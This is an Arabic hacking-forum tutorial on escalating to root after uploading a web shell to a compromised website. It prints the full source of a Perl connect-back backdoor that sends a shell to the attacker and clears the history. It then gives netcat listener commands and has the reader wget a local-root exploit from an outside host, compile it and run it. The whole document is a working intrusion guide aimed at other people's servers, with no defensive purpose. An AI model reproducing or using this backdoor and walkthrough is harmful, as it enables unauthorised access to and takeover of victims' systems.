الان لأول مرة في القراصنة العرب شرح كيفية الحصول على الرووت ...

بسم الله الرحمن الرحيم

السلام عليكم شباب

كيف حالكم انشاء الله بخير ؟؟

اليوم راح نشرح كيف نحصو على الرووت بعد ما نرفع شيل على موقع

يالا نبدأ (بسم الله) ::..

بالبداية يا شباب لازم تكون الك شوية خبرة في اختراق المواقع ورفع الشيل
ولازم تعرف بعض اوامر الشيل

شوف الصورة ::..
هلأ احنا رافعين شيل على موقع بإحدى الثغرات التي تسمح برفع الشيل

هسة ننتقل الى مجلد ال tmp
حتقولي كيف حقلك تطلع بالصورة

تمسح كل شي مكتوب وتحط


كود PHP:

/tmp 
لحد الان اوكي

ملاحظة :: بعض الثغرات مثل ال File inclusion مش تروح تكتب tmp على طول لازم ترجع ملف ملف الى ان توصل الى ال tmp وتدخل عليه

هسة وصلنا لمرحلة الباك دورر العكسي !!!!!
بالشرح تبعنا راح نستخدم هذا الباكدور ( مبرمج بالبيرل )


كود PHP:

#!/usr/bin/perl 
use IO::Socket; 
#IRAN HACKERS SABOTAGE Connect Back Shell          
#code by:LorD 
#We Are :LorD-C0d3r-NT                                            
# 
#lord@SlackwareLinux:/home/programing$ perl dc.pl 
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#Usage: dc.pl [Host] [Port] 
# 
#Ex: dc.pl 127.0.0.1 2121 
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#

 Resolving HostName 
#

 Connecting... 127.0.0.1 
#

 Spawning Shell 
#

 Connected to remote host 

#bash-2.05b# nc -vv -l -p 2121 
#listening on [any] 2121 ... 
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121 
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- 
# 
#--==Systeminfo==-- 
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux 
# 
#--==Userinfo==-- 
#uid=1001(lord) gid=100(users) groups=100(users) 
# 
#--==Directory==-- 
#/root 
# 
#--==Shell==-- 
# 
$system   = '/bin/sh'; 
$ARGC=@ARGV; 
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n"; 
if ($ARGC!=2) { 
   print "Usage: $0 [Host] [Port] \n\n"; 
   die "Ex: $0 127.0.0.1 2121 \n"; 
} 
use Socket; 
use FileHandle; 
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; 
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; 
print "

 Resolving HostName\n"; 
print "

 Connecting... $ARGV[0] \n"; 
print "

 Spawning Shell \n"; 
print "

 Connected to remote host \n"; 
SOCKET->autoflush(); 
open(STDIN, ">&SOCKET"); 
open(STDOUT,">&SOCKET"); 
open(STDERR,">&SOCKET"); 
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n"; 
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo; 
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- "); 
system($system); 
#EOF 
تاخذ الكود Copy تخزنة بإمتداد pl

بعد ما تخزنة ترفعة على مجلد tmp حتقولي كيف راح ؟؟

على فكرة اذا كان مكتوب [OK] يعني مسموح الرفع واذا كان [Read-Only] يعني ما بتقدر ترفع بس تقرأ
و دائما ملف ال tmp يكون تصريحة 777 يعني تقدر ترفع ملفات

حتقولي رفعنا البااكدور شو بنسوي هلأ ؟؟
اقلك تعطيه تصريح 777
حتقولي كيف ؟؟
حقولك في كتابة قدام الباكدورر -rw------- تحت حقل Perms اكبس عليها

حتقولي اها كبسنا عليها وبعدين ؟؟؟
حقولك اشرهم كلهم

وبعدين اكبس Save
راح ترجع لمجلد ال tmp وتلاقي قدام الباكدوور -rwxrwxrwx وهاد الرمز يعني تصريح البكدورر 777

حتقولي اعطيناه تصريح 777 وبعدين ؟؟
حقولك شوي شوي علي موتني (بمزح )

هسة تروح تشغل النت كات
(( للتحمــــيــــل ))
حتقولي كيف
بعد ما تنزل الاداة وتفك الضغط تنقل مجلد nc الى الدرايف C
وتروح START >> RUN >> cmd
كتب


كود PHP:

cd 
cd nc 
وهاي صورة توضيحية ::..

حتقولي اه وبعدين ؟؟
حقولك شغل التنصيت بالنت كات

حتقولي كيف ؟؟؟؟
حقولك اكتب الامر هاد


كود PHP:

nc -vv -l -p 2121 
راح يكتبلك


كود PHP:

C:nc>nc -vv -l -p 2121 
Listening For [any] 2121 ... 
هسة اعمل MiniMize لشاشة الدوس مش تسكرها نزلها تحت

هسة نرجع للشيل
نكبس على الباكدور الي رفعناه
راح يطلع الكود تبعو وفي ايقونات فوق

شوف الصورة ::..

نكبس على الايقونة المظللة بالون الاحمر

راح يطلع زي هيك

حتقولي هلأ ايش نعمل ؟؟؟
حقولك نمحي كل موجود بال تكست
يعني نمحي perl dc.pl
ونظيف هذا الكود


كود PHP:

perl dc.pl Your IP 2121 
مع تغيير Your IP الى الاي بي تبعك
و اكبس Execute

نروح نشوف شاشة الدوس نلاقيه الباكدوررر متصل ..
وهاي صورة

هسة نرجع للشيل نشوف ايش نوع النظام تبع السيرفر
شوف الصورة ::..

سة نروح ندور لة على LocalR00t
نروح ل
http://www.milw0rm.com/parse.php?platform=linux

ننزل الى خانة ال Local
وندور الى ان تلقاه
او تدور عليه بأي موقع سكيورتي ...
طبعا كل نظام اله لوكال رووت خاص به
هسة انا لقيت LocalR00t
http://members.lycos.co.uk/iraqistart/lob.zip

نروووح نرفعه بأوامر اللينكس الي راح نطبقه من الدوس ( يعني من الباكدورر العكسي ) ..
نرجع لشاشة الدوس ..
نكتب الامر
id
لبيان حالتك على السيرفر

بعدين نكتب الامر
cd /tmp
عشان ينقلنا الى مجلد ال tmp
ثم نكتب الامر pwd لنعرف مكاننا في الموقع
راح يحكلك
/tmp
هلأ نرفع اللوكال روت بأمر من اوامر الرفع في اللينكس

راح نستخدم الامر wget
http://members.lycos.co.uk/iraqistart/lob.zip
لاحظ الصورة الان

الان نقوم بفك الضغط عن طريق الامر التالي
unzip lob.zip
يصبح
lob.c

نقوم بترجمة اللوكال رووت


كود PHP:

gcc -o lob lob.c 
ثم نعطيه التصريح التالي


كود PHP:

chmod +x lob 
ثم نقوم بتشغيله عن طريق الامر التالي


كود PHP:

./lob 
بعدها اكتب الامر
id
الان انت الرووت
شوف الصورة ::..

انتهى الشرح (اهووووووووووووووووو)


انشاء الله ينال على اعجابكم
واختراقات موفقة انشاء الله

ملاحظة اخيرة قبل لا تشغل النت كات اغلق الفايروول تبع جهازك
اترجاكم يا شباب لاتنقلوا الموضوع والله تعبت فيه

جميع الحقوق محفوظة للكاتب